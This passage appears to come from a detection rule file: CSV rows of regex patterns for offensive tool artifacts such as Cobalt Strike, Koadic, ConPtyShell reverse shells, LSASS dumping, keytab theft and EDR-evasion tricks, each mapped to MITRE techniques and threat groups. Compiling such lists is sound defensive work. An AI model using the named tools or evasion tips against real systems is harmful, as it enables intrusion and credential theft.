- Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*comnode_##*",".{0,1000}comnode_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*Company'>Unam Sanctam*",".{0,1000}Company\'\>Unam\sSanctam\<\/Data\>.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" 
"*compile_implant*",".{0,1000}compile_implant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Complete log of pspy (may contain commands run in this test):*",".{0,1000}Complete\slog\sof\spspy\s\(may\scontain\scommands\srun\sin\sthis\stest\)\:.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*completedns-get-ns-history*",".{0,1000}completedns\-get\-ns\-history.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*COMPlus_ETWEnabled=0\0\0\0*",".{0,1000}COMPlus_ETWEnabled\=0\\0\\0\\0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*compress_encode_obfs*",".{0,1000}compress_encode_obfs.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ComputerDefaultsUACBypass.lua*",".{0,1000}ComputerDefaultsUACBypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*ComputerDirectory\*.FullDump.txt*",".{0,1000}ComputerDirectory\\.{0,1000}\.FullDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*comsvcs_lsass*",".{0,1000}comsvcs_lsass.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ComsvcsLSASS*",".{0,1000}ComsvcsLSASS.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Con7ext Shell V.2*",".{0,1000}Con7ext\sShell\sV\.2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*conda activate kraken*",".{0,1000}conda\sactivate\skraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and 
defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*conda create -n kraken python=*",".{0,1000}conda\screate\s\-n\skraken\spython\=.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*config/51pwn/CVE-*",".{0,1000}config\/51pwn\/CVE\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*CONFIG_NETKIT_DEBUG*",".{0,1000}CONFIG_NETKIT_DEBUG.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*config_steal /etc/krb5.conf /etc/krb5.keytab*",".{0,1000}config_steal\s\/etc\/krb5\.conf\s\/etc\/krb5\.keytab.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*Confuser.CLI.Exe*",".{0,1000}Confuser\.CLI\.Exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*Confuser.CLI.exe*",".{0,1000}Confuser\.CLI\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Confuser.DynCipher.dll*",".{0,1000}Confuser\.DynCipher\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Confuser.Renamer.dll*",".{0,1000}Confuser\.Renamer\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*ConfuserEx (CLI)*",".{0,1000}ConfuserEx\s\(CLI\).{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx 
Command-line*",".{0,1000}ConfuserEx\sCommand\-line.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Core*",".{0,1000}ConfuserEx\sCore.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Dynamic Cipher Library*",".{0,1000}ConfuserEx\sDynamic\sCipher\sLibrary.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Protections*",".{0,1000}ConfuserEx\sProtections.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Renamer*",".{0,1000}ConfuserEx\sRenamer.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx Runtime*",".{0,1000}ConfuserEx\sRuntime.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - 
T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ConfuserEx.CLI: *",".{0,1000}ConfuserEx\.CLI\:\s.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*Connect-AzureAD -AadAccessToken -AccountId *",".{0,1000}Connect\-AzureAD\s\-AadAccessToken\s\-AccountId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*connormcgarr/tgtdelegation*",".{0,1000}connormcgarr\/tgtdelegation.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*conptyshell *",".{0,1000}conptyshell\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*ConPtyShell.cs*",".{0,1000}ConPtyShell\.cs.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell.exe*",".{0,1000}ConPtyShell\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell.git*",".{0,1000}ConPtyShell\.git.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" 
"*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*ConPtyShell_dotnet2.exe*",".{0,1000}ConPtyShell_dotnet2\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Console.WriteLine*self executing the payload*",".{0,1000}Console\.WriteLine.{0,1000}self\sexecuting\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*ConsoleHost_history.txt.jasmin*",".{0,1000}ConsoleHost_history\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*-consoleoutput 
-DomainRecon*",".{0,1000}\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*-consoleoutput -Localrecon*",".{0,1000}\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*contact_harvester*",".{0,1000}contact_harvester.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ContainYourself.cpp*",".{0,1000}ContainYourself\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself.exe*",".{0,1000}ContainYourself\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 
- T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself.sln*",".{0,1000}ContainYourself\.sln.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself-main*",".{0,1000}ContainYourself\-main.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc.cpp*",".{0,1000}ContainYourselfPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc.exe*",".{0,1000}ContainYourselfPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc\*",".{0,1000}ContainYourselfPoc\\.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - 
T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfTempFile.txt*",".{0,1000}ContainYourselfTempFile\.txt.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContentHijacking.swf*",".{0,1000}ContentHijacking\.swf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ConvertFrom-LDAPLogonHours*",".{0,1000}ConvertFrom\-LDAPLogonHours.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Convert-NT4toCanonical*",".{0,1000}Convert\-NT4toCanonical.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ConvertTo-LogonHoursArray*",".{0,1000}ConvertTo\-LogonHoursArray.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ConvertTo-Rc4ByteStream*",".{0,1000}ConvertTo\-Rc4ByteStream.{0,1000}","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
